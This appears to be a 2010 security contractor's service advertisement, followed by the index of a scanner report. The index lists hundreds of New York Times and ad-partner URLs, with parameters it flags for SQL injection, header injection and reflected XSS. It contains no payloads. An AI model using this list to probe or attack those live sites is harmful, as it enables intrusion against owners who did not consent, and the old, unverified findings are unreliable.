Contractor for Hire: Per Minute, Per Day, Bounty Hunting
Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for
CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:
Report generated by XSS.CX at Fri Nov 12 22:21:15 CST 2010.
Cross Site Scripting Reports | Hoyt LLC Research
1. SQL injection
1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]
1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]
1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]
1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]
1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]
1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]
2. HTTP header injection
2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
2.2. http://50.xg4ken.com/media/redir.php [url[] parameter]
2.3. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]
2.4. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]
2.5. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]
2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]
2.8. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]
2.9. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]
2.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
2.11. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]
2.12. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]
2.13. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]
2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]
2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]
2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]
2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]
2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]
2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]
2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]
2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]
2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]
2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]
2.24. http://nytimes.com/rss [REST URL parameter 1]
2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]
2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]
2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]
2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]
2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]
2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]
2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]
2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]
2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]
2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]
2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]
2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]
2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]
2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]
2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]
2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]
2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]
2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]
2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]
2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]
2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]
2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]
2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]
2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]
2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]
2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]
2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]
2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]
2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]
2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]
2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]
2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]
2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]
2.58. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]
2.59. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]
2.60. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]
2.61. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]
2.62. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]
2.63. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]
2.64. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]
2.65. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]
2.66. http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]
2.67. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]
2.68. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]
2.69. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]
2.70. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]
2.71. http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]
2.72. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]
2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]
2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]
2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]
2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]
2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]
2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]
2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]
2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]
2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]
2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]
3. Cross-site scripting (reflected)
3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]
3.2. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]
3.3. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]
3.4. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]
3.5. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]
3.6. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]
3.7. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]
3.8. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]
3.9. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]
3.10. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]
3.11. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]
3.12. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]
3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]
3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
3.30. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
3.31. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snx parameter]
3.32. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
3.33. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sz parameter]
3.34. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [click parameter]
3.35. http://artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [src parameter]
3.36. http://artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [src parameter]
3.37. http://artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [src parameter]
3.38. http://artsbeat.blogs.nytimes.com/category/art-design/ [REST URL parameter 2]
3.39. http://artsbeat.blogs.nytimes.com/category/arts-general/ [REST URL parameter 2]
3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]
3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]
3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]
3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]
3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]
3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]
3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]
3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]
3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]
3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]
3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]
3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]
3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]
3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]
3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]
3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]
3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]
3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]
3.58. http://artsbeat.blogs.nytimes.com/tag/rubicon/ [REST URL parameter 2]
3.59. http://artsbeat.blogs.nytimes.com/tag/the-nutcracker-chronicles/ [REST URL parameter 2]
3.60. http://artsbeat.blogs.nytimes.com/tag/today/ [REST URL parameter 2]
3.61. http://artsbeat.blogs.nytimes.com/tag/tony-scott/ [REST URL parameter 2]
3.62. http://artsbeat.blogs.nytimes.com/tag/unstoppable/ [REST URL parameter 2]
3.63. http://artsbeat.blogs.nytimes.com/tag/week-in-culture-pictures/ [REST URL parameter 2]
3.64. http://atwar.blogs.nytimes.com/2010/11/12/the-state-of-schools-in-swat/ [src parameter]
3.65. http://bits.blogs.nytimes.com/2010/11/12/facebook-to-start-an-e-mail-service/ [src parameter]
3.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]
3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]
3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]
3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]
3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]
3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]
3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]
3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]
3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter]
3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1]
3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2]
3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]
3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]
3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]
3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]
3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]
3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]
3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]
3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2]
3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter]
3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1]
3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2]
3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter]
3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1]
3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2]
3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter]
3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
3.110. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
3.111. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]
3.112. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]
3.113. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
3.114. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
3.115. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]
3.116. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]
3.117. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
3.118. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
3.119. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]
3.120. http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]
3.121. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
3.122. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
3.123. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]
3.124. http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]
3.125. http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]
3.126. http://digg.com/remote-submit [REST URL parameter 1]
3.127. http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]
3.128. http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]
3.129. http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]
3.130. http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]
3.131. http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]
3.132. http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]
3.133. http://harpers.org/subjects/Sentences [REST URL parameter 2]
3.134. http://idolator.com/ [name of an arbitrarily supplied request parameter]
3.135. http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]
3.136. http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]
3.137. http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]
3.138. http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]
3.139. http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]
3.140. http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]
3.141. http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]
3.142. http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]
3.143. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]
3.144. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]
3.145. http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]
3.146. http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]
3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]
3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]
3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]
3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]
3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]
3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]
3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]
3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]
3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]
3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]
3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]
3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]
3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]
3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]
3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]
3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]
3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]
3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]
3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]
3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]
3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]
3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]
3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]
3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]
3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]
3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter]
3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]
3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]
3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]
3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]
3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]
3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]
